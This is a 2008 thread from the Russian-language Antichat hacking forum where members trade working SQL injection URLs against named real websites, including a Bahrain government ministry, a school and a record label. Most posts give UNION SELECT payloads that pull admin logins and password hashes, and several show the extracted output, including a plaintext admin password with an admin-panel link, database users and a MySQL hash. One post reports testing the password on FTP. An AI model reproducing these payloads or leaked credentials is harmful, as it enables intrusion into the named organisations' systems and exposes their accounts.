ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.01.2008, 19:06
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Tigger,
http://www.bikeshop.com.ua/news.php?id=-9+union+select+1,concat_ws(0x3a3a,admin_email_addr ess,admin_password),3,4,5+from+admin/*
http://www.bikeshop.com.ua/admin
|
|
|
06.01.2008, 19:10
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Tigger,
http://www.eqvitec.com/news.php?id=2&vuosi=2002&uutinen=-24+union+select+1,2,3,4,5,6,concat(uname,0x3a,upas s),8+from+admin/*
http://www.eqvitec.fi/admin/
|
|
|
|
06.01.2008, 19:11
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
laurenceschool.com
Код HTML:
http://www.laurenceschool.com/page.php?id=-13+union+select+1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1)/*&title=Links
USER:laurenceschool@10.2.3.30
VERSION:4.1.11-Debian_4sarge7
DATABASE:laurenceschool_com_-_base
dalelane.co.uk
Microsoft Access
Ни одной стандартной таблици 
Только раскрытие путей и 13 столбцов.
Код HTML:
http://dalelane.co.uk/page.php?id=918+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+msysobjects+in+'.'
|
|
|
|
06.01.2008, 19:55
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
Код:
http://www.mwh.gov.bh/Tnews.php?id=11+UNION+SELECT+1,user,password,4,5,6,7+FROM+users/*
|
|
|
|
Вопрос про sql-injection. |
06.01.2008, 20:01
|
|
Новичок
Регистрация: 06.01.2008
Сообщений: 15
Провел на форуме:
29345
Репутация:
35
|
|
Вопрос про sql-injection.
Вот недавно проверял один сайт и вроде бы нашол sql injection.
Вот 2 примера из сайта:
1. я набрал этот url :
http://www.site.com/script.php?file=2-1'
Получил ответ :
Warning: imagecreatefromjpeg() [function.imagecreatefromjpeg]: Unable to access 2-1 in /home/site.com/script.php on line 3
Warning: imagecreatefromjpeg(2-1) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /home/site.com/script.php on line 3
Warning: imagesx(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 4
Warning: imagesy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 5
Warning: imagecopyresized(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 23
Warning: imagedestroy(): supplied argument is not a valid Image resource in /home/site.com/script.php on line 25
-------------------- это первый пример
вопросы от меня:
1. есть ли sql injection?
2. если да,то можете пример дать?
info: што в красном цвете,это текст который я водил в url (2-1')
--------------------
Второй пример:
http://www.site.com/forum.php?id=4686&start=20'
Ответ:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site.com/forum.php on line 439
------------------
вопросы от меня:
1. есть ли sql injection?
2. если да,то можете пример дать?
Зарание спасибо за ответы!
|
|
|
|
06.01.2008, 20:15
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
laeot не флуди !!!
иди в другую тему !!!
|
|
|
|
06.01.2008, 21:00
|
|
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223
Репутация:
91
|
|
Код:
http://russian.tebyan.net/Sites/default.php?id=-5898+UNION+SELECT+1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15+FROM+mysql.user/*
|
|
|
|
06.01.2008, 23:33
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
www.centurymedia.com
http://www.centurymedia.com/
http://www.centurymedia.com/us/news.php?artist_ID=-31+union+select+1,2,3,user,5,6+from+mysql.user/*
Еще есть колонка password, но там только один пароли((
|
|
|
|
06.01.2008, 23:58
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
www.rtg.us
http://www.rtg.us/
http://www.rtg.us/news.php?mode=detail&id=-3+union+select+1,concat(name,char(58),password),3, 4,5,6,7,8+from+admins/*
admin : puhhema
Админка: http://www.rtg.us/admin
Пароль к FTP не подходит
Через limit вытащил еще пользователей, но не проверял...
Может там и будут для FTP
|
|
|
|
07.01.2008, 00:00
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
forestenterprise.com
Код HTML:
http://www.forestenterprise.com/page.php?id=-23+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE( )),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
USER:fealtd@localhost
VERSION:4.1.22
DATABASE:fealtd
Код HTML:
http://www.forestenterprise.com/page.php?id=-23+union+select+0,concat(user,0x3a,password),2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user/*
Таблица - mysql.user
Поля - user,password
fealtd:674bea6212f90cad
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
